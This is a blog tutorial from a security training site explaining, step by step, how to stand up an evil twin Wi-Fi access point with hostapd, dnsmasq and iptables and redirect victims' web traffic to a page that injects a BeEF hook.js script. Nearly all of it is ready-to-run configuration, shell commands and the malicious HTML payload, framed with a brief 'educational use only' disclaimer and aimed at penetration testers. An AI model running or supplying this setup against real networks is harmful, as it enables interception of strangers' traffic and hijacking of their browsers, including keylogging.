Using Wireless Evil Twin and BeEF to Compromise Target Machines

August 2, 2016 | Views: 5825

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello all,

I’m the author of Infernal Wireless Suite. Today, I’d like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.

First thing first, what is an Evil Twin attack?

An Evil Twin attack is when you attempt to impersonate a wireless access point and lure probing devices to connect to you. This way, you’re acting as a legitimate access point and proving internet through your own internet access interface. Any victim connected to your fake access point would be subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)

Second, what is the BeEF Framework ?

BeEF is browser exploitation framework focused on browser exploitation. This framework is used mainly during penetration test and via JavaScript injection into the browser content, mainly via XSS exploitation or content manipulation. This tool allows the attacker to take control of compromised machine, insert key logger and much more. You can find more information here: http://beefproject.com/

Now, as the title implies, I’d like to show you one of the attack vectors I implemented in my tool, infernal wireless, and I wanted to show you how to do it manually.

Warning:

This tutorial is only for educational and professional use.

Please don’t use for illegal purposes!!

Note:

My network cards are as follows:

wlan0 – wireless Interface name, yours might be different, replace if needed

eth0 – internet facing interface name, yours might be different, replace if needed

Prerequisites: 

Preferred OS: Kali Linux

Install: hostapd,  dnsmasq, BeeF Framework

First, we need to create a fake Access Point with a desired name.

Step 1: Create a configuration file for hostapd

Type the following into a free_AP.conf and save it.

interface=wlan0 # (change this if it differs from yours)

driver=nl80211

ssid= <fakeAPName> # you access Point name

channel=1

Execute: 

hostapd free_AP.conf &

Step 2: Configure DNS Settings:

From a command prompt, execute below:

sed -i ‘s#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#’ /etc/init.d/hostapd

cat <<EOF > /etc/dnsmasq.conf

log-facility=/var/log/dnsmasq.log

#address=/#/10.0.0.1

#address=/google.com/10.0.0.1

interface=wlan0 # this is your wireless interface, change if different

dhcp-range=10.0.0.10,10.0.0.250,12h

dhcp-option=3,10.0.0.1

dhcp-option=6,10.0.0.1

#no-resolv

log-queries

EOF

Execute: 

service dnsmasq start

Step 3 – Set up NAT Table:

Execute the following from the command line:

ifconfig wlan0 up

ifconfig wlan0 10.0.0.1/24

iptables -t nat -F

iptables -F

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

echo ‘1’ > /proc/sys/net/ipv4/ip_forward

Step 4 – Set up BeEF and HTTP Service:

From command line or by any other means you have, enable HTTP Service:

/etc/init.d/apache2 start

Create index.html under your root folder .i.e /var/www/html/index.html and write the code below:

<html>

<body>

<script src=”http://10.0.0.1:3000/hook.js”></script>

</body>

</html>

Step 5 – Another iptable set up:

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 10.0.0.1:80

iptables -t nat -A POSTROUTING -j MASQUERADE

Step 6 – Launch BeEF Framework:

From the command prompt, execute this:

firefox http://127.0.0.1:3000/ui/panel &

Login credentials are beef:beef

Now, it’s just a matter of waiting till someone connects to your network.


The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY

Now, wait. If you want to use the automated too that I created, you may download here: https://github.com/entropy1337/infernal-twin

Thank you

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
8 Comments
  1. That’s so simple

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel